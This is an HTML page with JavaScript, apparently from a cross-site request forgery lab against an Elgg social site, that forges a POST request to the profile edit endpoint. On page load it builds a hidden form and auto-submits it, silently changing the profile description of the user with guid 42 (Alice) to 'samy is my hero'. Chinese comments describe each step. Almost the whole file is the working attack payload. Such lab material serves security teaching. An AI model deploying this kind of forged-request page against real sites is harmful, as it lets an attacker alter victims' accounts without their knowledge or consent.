<html><body>
	<h1>This page forges an HTTP POST request.</h1>
	<script type="text/javascript">
		function post(url, fields) {
			//创建一个<form>元素
			var p=document.createElement("form");//构建表单
			p.action = url;
			p.innerHTML = fields ;
			p.target = "_self" ;
			p.method = "post" ;
			//将表单追加到当前页面
			document.body.appendChild(p) ;
			//提交表单.
			p.submit();
		}
		function csrf_hack() {
			var fields;
			fields += "<input type='hidden' name='name' value='Alice'>";
			fields += "<input type='hidden' name='description' value='samy is my hero'>";
			fields += "<input type='hidden' name='accesslevel[description]' value='2' >";
			fields += "<input type='hidden' name='briefdescription' value=''>";
			fields += "<input type='hidden' name='accesslevel[briefdescription]' value='2'>";
			fields += "<input type='hidden' name='location' value=''>";
			fields += "<input type='hidden' name='accesslevel[location]' value='2'>";
			fields += "<input type='hidden' name='guid' value='42'>" ;
			var url = "http://www.csrflabelgg.com/action/profile/edit";
			post(url,fields) ;
		}
		//在加载页面后调用csrf_hack ( )
		window.onload=function(){csrf_hack(); }
	</script>
</body></html>